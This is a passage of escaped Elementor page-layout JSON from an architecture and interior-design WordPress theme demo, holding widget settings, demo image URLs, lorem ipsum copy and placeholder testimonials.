":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work 